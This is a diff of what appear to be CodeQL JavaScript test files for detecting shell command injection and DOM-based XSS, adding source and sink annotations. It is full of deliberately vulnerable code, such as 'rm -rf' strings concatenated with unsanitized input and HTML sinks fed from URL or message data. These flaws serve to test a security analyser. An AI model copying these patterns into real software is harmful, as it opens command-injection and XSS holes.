cp.exec("rm -rf " + name); // $ Alert
module.exports.blah = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.execFile(name, [name]);
cp.execFile(name, name);
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.foo = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.foo.bar = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.foo.bar = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
function cla() { }
cla.prototype.method = function (name) {
cp.exec("rm -rf " + name); // $ Alert
cla.prototype.method = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.cla = new cla();
function cla2() { }
cla2.prototype.method = function (name) {
cp.exec("rm -rf " + name); // $ Alert
cla2.prototype.method = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.bla = new cla2();
module.exports.lib2 = require("./lib2.js")
class Cla3 {
constructor(name) {
cp.exec("rm -rf " + name); // $ Alert
constructor(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
static foo(name) {
cp.exec("rm -rf " + name); // $ Alert
static foo(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
bar(name) {
cp.exec("rm -rf " + name); // $ Alert
bar(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.exec("rm -rf " + notASource);
}
@@ -46,41 +46,41 @@ class Cla3 {
module.exports.cla3 = Cla3;
module.exports.mz = function (name) {
require("mz/child_process").exec("rm -rf " + name); // $ Alert
module.exports.mz = function (name) { // $ Source
require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink
}
module.exports.flow = function (name) {
var cmd1 = "rm -rf " + name; // $ Alert
module.exports.flow = function (name) { // $ Source
var cmd1 = "rm -rf " + name; // $ Alert Sink
cp.exec(cmd1);
var cmd2 = "rm -rf " + name; // $ Alert
var cmd2 = "rm -rf " + name; // $ Alert Sink
function myExec(cmd) {
cp.exec(cmd);
}
myExec(cmd2);
}
module.exports.stringConcat = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.stringConcat = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.exec(name);
cp.exec("for foo in (" + name + ") do bla end"); // $ Alert
cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink
cp.exec("cat /foO/BAR/" + name) // $ Alert
cp.exec("cat /foO/BAR/" + name) // $ Alert Sink
cp.exec("cat \"" + name + "\"") // $ Alert
cp.exec("cat \"" + name + "\"") // $ Alert Sink
cp.exec("cat '" + name + "'") // $ Alert
cp.exec("cat '" + name + "'") // $ Alert Sink
cp.exec("cat '/foo/bar" + name + "'") // $ Alert
cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink
cp.exec(name + " some file")
}
module.exports.arrays = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.arrays = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var args1 = ["node"];
args1.push(name); // $ Alert
@@ -94,7 +94,7 @@ module.exports.arrays = function (name) {
}
var util = require("util");
module.exports.format = function (name) {
module.exports.format = function (name) { // $ Source
cp.exec(util.format("rm -rf %s", name)); // $ Alert
cp.exec(util.format("rm -rf '%s'", name)); // $ Alert
@@ -108,8 +108,8 @@ module.exports.format = function (name) {
cp.exec(require("printf")('rm -rf %s', name)); // $ Alert
}
module.exports.valid = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.valid = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!isValidName(name)) {
return;
@@ -117,8 +117,8 @@ module.exports.valid = function (name) {
cp.exec("rm -rf " + name);
}
module.exports.safe = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.safe = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!isSafeName(name)) {
return;
@@ -127,8 +127,8 @@ module.exports.safe = function (name) {
}
class Cla4 {
wha(name) {
cp.exec("rm -rf " + name); // $ Alert
wha(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
static bla(name) {
@@ -145,20 +145,20 @@ function Cla5(name) {
}
module.exports.cla5 = new Cla5();
module.exports.indirect = function (name) {
let cmd = "rm -rf " + name; // $ Alert
module.exports.indirect = function (name) { // $ Source
let cmd = "rm -rf " + name; // $ Alert Sink
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb);
}
module.exports.indirect2 = function (name) {
module.exports.indirect2 = function (name) { // $ Source
let cmd = name;
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb);
let cmd2 = "rm -rf " + name; // $ Alert
let cmd2 = "rm -rf " + name; // $ Alert Sink
var args2 = [cmd2];
cp.spawn(
'cmd.exe',
@@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) {
);
}
module.exports.cmd = function (command, name) {
module.exports.cmd = function (command, name) { // $ Source
cp.exec("fo | " + command);
cp.exec("fo | " + name); // $ Alert
cp.exec("fo | " + name); // $ Alert Sink
}
module.exports.sanitizer = function (name) {
module.exports.sanitizer = function (name) { // $ Source
var sanitized = "'" + name.replace(/'/g, "'\\''") + "'"
cp.exec("rm -rf " + sanitized);
var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert
cp.exec("rm -rf " + broken); // $ Alert
var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink
cp.exec("rm -rf " + broken); // $ Alert Sink
}
var path = require("path");
module.exports.guard = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.guard = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!path.exist(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
return;
}
cp.exec("rm -rf " + name);
}
module.exports.blacklistOfChars = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.blacklistOfChars = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (/[^A-Za-z0-9_\/:=-]/.test(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
}
module.exports.whitelistOfChars = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.whitelistOfChars = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (/^[A-Za-z0-9_\/:=-]$/.test(name)) {
cp.exec("rm -rf " + name);
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
}
module.exports.blackList2 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.blackList2 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!/^([a-zA-Z0-9]+))?$/.test(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
process.exit(-1);
}
cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`.
cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`.
}
module.exports.accessSync = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.accessSync = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
try {
path.accessSync(name);
@@ -233,7 +233,7 @@ module.exports.accessSync = function (name) {
return;
}
cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer.
cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer.
}
var cleanInput = function (s) {
@@ -245,27 +245,27 @@ var cleanInput = function (s) {
return s;
}
module.exports.goodSanitizer = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.goodSanitizer = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var cleaned = cleanInput(name);
cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node.
cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node.
}
var fs = require("fs");
module.exports.guard2 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.guard2 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!fs.existsSync("prefix/" + name)) {
cp.exec("rm -rf prefix/" + name); // $ Alert
cp.exec("rm -rf prefix/" + name); // $ Alert Sink
return;
}
cp.exec("rm -rf prefix/" + name);
}
module.exports.sanitizerProperty = function (obj) {
cp.exec("rm -rf " + obj.version); // $ Alert
module.exports.sanitizerProperty = function (obj) { // $ Source
cp.exec("rm -rf " + obj.version); // $ Alert Sink
obj.version = "";
@@ -273,12 +273,12 @@ module.exports.sanitizerProperty = function (obj) {
}
module.exports.Foo = class Foo {
start(opts) {
cp.exec("rm -rf " + opts.bla); // $ Alert
start(opts) { // $ Source
cp.exec("rm -rf " + opts.bla); // $ Alert Sink
this.opts = {};
this.opts.bla = opts.bla
cp.exec("rm -rf " + this.opts.bla); // $ Alert
cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink
}
}
@@ -304,25 +304,25 @@ function sanitizeShellString(str) {
return result
}
module.exports.sanitizer2 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.sanitizer2 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var sanitized = sanitizeShellString(name);
cp.exec("rm -rf " + sanitized);
}
module.exports.typeofcheck = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.typeofcheck = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (typeof name === "undefined") {
cp.exec("rm -rf " + name);
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
}
module.exports.typeofcheck = function (arg) {
var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert
module.exports.typeofcheck = function (arg) { // $ Source
var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink
cp.exec(cmd);
}
@@ -336,8 +336,8 @@ module.exports.unproblematic = function() {
cp.exec("rm -rf " + id("test"));
};
module.exports.problematic = function(n) {
cp.exec("rm -rf " + id(n)); // $ Alert
module.exports.problematic = function(n) { // $ Source
cp.exec("rm -rf " + id(n)); // $ Alert Sink
};
module.exports.typeofNumber = function(n) {
@@ -346,9 +346,9 @@ module.exports.typeofNumber = function(n) {
}
};
function boundProblem(safe, unsafe) {
function boundProblem(safe, unsafe) { // $ Source
cp.exec("rm -rf " + safe);
cp.exec("rm -rf " + unsafe); // $ Alert
cp.exec("rm -rf " + unsafe); // $ Alert Sink
}
Object.defineProperty(module.exports, "boundProblem", {
@@ -402,8 +402,8 @@ function yetAnohterSanitizer(str) {
return result;
}
module.exports.sanitizer3 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.sanitizer3 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var sanitized = yetAnohterSanitizer(name);
cp.exec("rm -rf " + sanitized);
@@ -411,8 +411,8 @@ module.exports.sanitizer3 = function (name) {
const cp = require("child_process");
const spawn = cp.spawn;
module.exports.shellOption = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.shellOption = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert
cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert
@@ -438,13 +438,13 @@ function build(first, last) {
};
var asyncExec = require("async-execute");
module.exports.asyncStuff = function (name) {
asyncExec("rm -rf " + name); // $ Alert
module.exports.asyncStuff = function (name) { // $ Source
asyncExec("rm -rf " + name); // $ Alert Sink
}
const myFuncs = {
myFunc: function (name) {
asyncExec("rm -rf " + name); // $ Alert
myFunc: function (name) { // $ Source
asyncExec("rm -rf " + name); // $ Alert Sink
}
};
@@ -474,13 +474,13 @@ const {promisify} = require('util');
const exec = promisify(require('child_process').exec);
module.exports.check = function check(config) {
module.exports.check = function check(config) { // $ Source
const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert
return exec(cmd);
}
module.exports.splitConcat = function (name) {
let args = ' my name is ' + name; // $ Alert
module.exports.splitConcat = function (name) { // $ Source
let args = ' my name is ' + name; // $ Alert Sink
let cmd = 'echo';
cp.exec(cmd + args);
}
@@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) {
cp: require('child_process')
};
module.exports.myIndirectThing = function (name) {
MyThing.cp.exec("rm -rf " + name); // $ Alert
module.exports.myIndirectThing = function (name) { // $ Source
MyThing.cp.exec("rm -rf " + name); // $ Alert Sink
}
});
@@ -506,48 +506,48 @@ for (var name in imp){
module.exports[name] = imp[name];
}
module.exports.sanitizer4 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.sanitizer4 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (isNaN(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(parseInt(name))) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(+name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(parseInt(name, 10))) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(name - 0)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(name | 0)) { // <- not a sanitizer
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
}
module.exports.shellThing = function (name) {
module.exports.shellThing = function (name) { // $ Source
function indirectShell(cmd, args, spawnOpts) {
cp.spawn(cmd, args, spawnOpts); // $ Alert
}
@@ -555,28 +555,28 @@ module.exports.shellThing = function (name) {
indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert
}
module.exports.badSanitizer = function (name) {
module.exports.badSanitizer = function (name) { // $ Source
if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer
exec("rm -rf " + name); // $ Alert
exec("rm -rf " + name); // $ Alert Sink
} else {
exec("rm -rf " + name); // $ Alert
exec("rm -rf " + name); // $ Alert Sink
}
if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer
exec("rm -rf " + name); // $ Alert
exec("rm -rf " + name); // $ Alert Sink
} else {
exec("rm -rf " + name);
}
}
module.exports.safeWithBool = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.safeWithBool = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (isSafeName(name)) {
cp.exec("rm -rf " + name);
}
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
if (isSafeName(name) === true) {
cp.exec("rm -rf " + name);
@@ -587,10 +587,10 @@ module.exports.safeWithBool = function (name) {
}
if (isSafeName(name) == false) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
function indirectThing(name) {
@@ -605,8 +605,8 @@ function moreIndirect(name) {
return indirectThing2(name) !== false;
}
module.exports.veryIndeirect = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.veryIndeirect = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (indirectThing(name)) {
cp.exec("rm -rf " + name);
@@ -623,15 +623,15 @@ module.exports.veryIndeirect = function (name) {
if (moreIndirect(name) !== false) {
cp.exec("rm -rf " + name);
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.sanitizer = function (name) {
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert
cp.exec("rm -rf " + sanitized); // $ Alert
module.exports.sanitizer = function (name) { // $ Source
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink
cp.exec("rm -rf " + sanitized); // $ Alert Sink
var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'"
cp.exec("rm -rf " + sanitized);

8
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js
View File

@@ -1,9 +1,9 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - is imported from main module.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // $ Alert - is imported from main module.
module.exports.foo = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module.
};

4
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js
View File

@@ -1,5 +1,5 @@
const cp = require("child_process");
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js`
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js`
};

10
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js
View File

@@ -1,15 +1,15 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js
module.exports.foo = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js
};
module.exports.amd = require("./amd.js");
module.exports.arrToShell = function (cmd, arr) {
module.exports.arrToShell = function (cmd, arr) { // $ Source
cp.spawn("echo", arr, {shell: true}); // $ Alert
}

4
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts
View File

@@ -1,5 +1,5 @@
var cp = require("child_process")
export default function (name) {
cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file.
export default function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file.
}

4
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js
View File

@@ -1,5 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file.
};

4
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts
View File

@@ -1,5 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
};

2
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js
View File

@@ -3,6 +3,6 @@ const dispatch = {
POST: require("./subsub"),
};
module.exports.foo = function (name, type) {
module.exports.foo = function (name, type) { // $ Source
dispatch[type](name);
};

2
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js
View File

@@ -1,5 +1,5 @@
const cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
};

6
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js
View File

@@ -1,13 +1,13 @@
this.addEventListener('message', function(event) {
this.addEventListener('message', function(event) { // $ Source
document.write(event.data); // $ Alert
})
this.addEventListener('message', function({data}) {
this.addEventListener('message', function({data}) { // $ Source
document.write(data); // $ Alert
})
function test() {
function foo(x, event, y) {
function foo(x, event, y) { // $ Source
document.write(x.data);
document.write(event.data); // $ Alert
document.write(y.data);

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js vendored
View File

@@ -10,6 +10,6 @@ angular.module('myApp', [])
}
});
addEventListener('message', (ev) => {
addEventListener('message', (ev) => { // $ Source
Cookie.set("unsafe", ev.data);
});

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js
View File

@@ -7,7 +7,7 @@ function main() {
document.body.innerHTML = `<span class="${classNames(window.name)}">Hello<span>`; // $ Alert
document.body.innerHTML = `<span class="${classNamesD(window.name)}">Hello<span>`; // $ Alert
document.body.innerHTML = `<span class="${classNamesB(window.name)}">Hello<span>`; // $ Alert
let unsafeStyle = classNames.bind({foo: window.name});
let unsafeStyle = classNames.bind({foo: window.name}); // $ Source
document.body.innerHTML = `<span class="${unsafeStyle('foo')}">Hello<span>`; // $ Alert
let safeStyle = classNames.bind({});
document.body.innerHTML = `<span class="${safeStyle(window.name)}">Hello<span>`; // $ Alert

8
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts
View File

@@ -5,7 +5,7 @@ function paste(e) {
if (!clipboardData) return;
const text = clipboardData.getData('text/plain');
const html = clipboardData.getData('text/html');
const html = clipboardData.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -40,7 +40,7 @@ $("#foo").bind('paste', (e) => {
if (!clipboardData) return;
const text = clipboardData.getData('text/plain');
const html = clipboardData.getData('text/html');
const html = clipboardData.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -68,7 +68,7 @@ async function getClipboardData(e: ClipboardEvent): Promise<Array<File | string>
}
if (e.clipboardData.types.includes('text/html')) {
const droppedHtml = e.clipboardData.getData('text/html');
const droppedHtml = e.clipboardData.getData('text/html'); // $ Source
const container = document.createElement('html');
container.innerHTML = droppedHtml; // $ Alert
const imgs = container.getElementsByTagName('img');
@@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise<Array<File | string>
const { data, inputType, isComposing, dataTransfer } = e;
if (!dataTransfer) return;
const html = dataTransfer.getData('text/html');
const html = dataTransfer.getData('text/html'); // $ Source
$("#id").html(html); // $ Alert
});
})();

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js vendored
View File

@@ -1,7 +1,7 @@
const d3 = require('d3');
function getTaint() {
return window.name;
return window.name; // $ Source
}
function doSomething() {

8
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js
View File

@@ -6,7 +6,7 @@ import dateformat from 'dateformat';
function main() {
let time = new Date();
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert
document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert
@@ -27,7 +27,7 @@ import MomentAdapter from "@date-io/moment";
import DayJSAdapter from "@date-io/dayjs"
function dateio() {
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
const dateFns = new DateFnsAdapter();
const luxon = new LuxonAdapter();
@@ -43,7 +43,7 @@ function dateio() {
import { DateTime } from "luxon";
function luxon() {
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert
document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert
@@ -51,7 +51,7 @@ function luxon() {
}
function dateio2() {
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
const moment = new MomentAdapter();
document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert

6
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts
View File

@@ -5,7 +5,7 @@ function drop(e) {
if (!dataTransfer) return;
const text = dataTransfer.getData('text/plain');
const html = dataTransfer.getData('text/html');
const html = dataTransfer.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -40,7 +40,7 @@ $("#foo").bind('drop', (e) => {
if (!dataTransfer) return;
const text = dataTransfer.getData('text/plain');
const html = dataTransfer.getData('text/html');
const html = dataTransfer.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -68,7 +68,7 @@ async function getDropData(e: DragEvent): Promise<Array<File | string>> {
}
if (e.dataTransfer.types.includes('text/html')) {
const droppedHtml = e.dataTransfer.getData('text/html');
const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source
const container = document.createElement('html');
container.innerHTML = droppedHtml; // $ Alert
const imgs = container.getElementsByTagName('img');

4
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js vendored
View File

@@ -1,5 +1,5 @@
function test() {
var tainted = document.location.search
var tainted = document.location.search // $ Source
$(tainted); // OK - location.search starts with '?'
$("body", tainted);
@@ -15,7 +15,7 @@ function test() {
elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert
elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert
let hash = window.location.hash;
let hash = window.location.hash; // $ Source
$(hash); // OK - start with '#'
$(hash.substring(1)); // $ Alert

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx
View File

@@ -2,7 +2,7 @@ var express = require("express");
var app = express();
app.get("/some/path", function (req, res) {
const locale = req.param("locale");
const locale = req.param("locale"); // $ Source
const breadcrumbList = [
{
"@type": "ListItem",

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js
View File

@@ -4,7 +4,7 @@ import jwt from "jsonwebtoken";
import { JSDOM } from "jsdom";
app.get('/some/path', function (req, res) {
var taint = req.param("wobble");
var taint = req.param("wobble"); // $ Source
jwt.verify(taint, 'my-secret-key', function (err, decoded) {
new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert

4
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js
View File

@@ -1,5 +1,5 @@
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(sanitize ? DOMPurify.sanitize(target) : target);
@@ -23,7 +23,7 @@ function test() {
}
function badSanitizer() {
var target = document.location.search
var target = document.location.search // $ Source
function sanitizeBad(x) {
return x; // No sanitization;

6
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx
View File

@@ -2,7 +2,7 @@ import { useRouter } from 'next/router'
export default function Post(params) {
const router = useRouter()
const { id } = router.query
const { id } = router.query // $ Source
return (
<>
@@ -22,8 +22,8 @@ export default function Post(params) {
export async function getServerSideProps(context) {
return {
props: {
id: context.params.id || "",
q: context.query?.foobar || "",
id: context.params.id || "", // $ Source
q: context.query?.foobar || "", // $ Source
}
}
}

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js vendored
View File

@@ -4,7 +4,7 @@ import { WebView } from 'react-native';
var app = express();
app.get('/some/path', function(req, res) {
let tainted = req.param("code");
let tainted = req.param("code"); // $ Source
<WebView html={tainted}/>; // $ Alert
<WebView source={{html: tainted}}/>; // $ Alert
});

8
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js vendored
View File

@@ -1,19 +1,19 @@
import { useState } from 'react';
function initialState() {
let [state, setState] = useState(window.name);
let [state, setState] = useState(window.name); // $ Source
return <div dangerouslySetInnerHTML={{__html: state}}></div>; // $ Alert
}
function setStateValue() {
let [state, setState] = useState('foo');
setState(window.name);
setState(window.name); // $ Source
return <div dangerouslySetInnerHTML={{__html: state}}></div>; // $ Alert
}
function setStateValueLazy() {
let [state, setState] = useState('foo');
setState(() => window.name);
setState(() => window.name); // $ Source
return <div dangerouslySetInnerHTML={{__html: state}}></div>; // $ Alert
}
@@ -22,7 +22,7 @@ function setStateValueLazy() {
setState(prev => {
document.body.innerHTML = prev; // $ Alert
})
setState(() => window.name);
setState(() => window.name); // $ Source
}
function setStateValueSafe() {

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js
View File

@@ -13,7 +13,7 @@ function escapeAttr(s) {
}
function test() {
var tainted = window.name;
var tainted = window.name; // $ Source
var elt = document.createElement();
elt.innerHTML = "<a href=\"" + escapeAttr(tainted) + "\">" + escapeHtml(tainted) + "</a>";
elt.innerHTML = "<div>" + escapeAttr(tainted) + "</div>"; // $ MISSING: Alert - not flagged -

4
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js
View File

@@ -1,6 +1,6 @@
(function() {
sessionStorage.setItem('session', document.location.search);
localStorage.setItem('local', document.location.search);
sessionStorage.setItem('session', document.location.search); // $ Source
localStorage.setItem('local', document.location.search); // $ Source
$('myId').html(sessionStorage.getItem('session')); // $ Alert
$('myId').html(localStorage.getItem('session'));

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js
View File

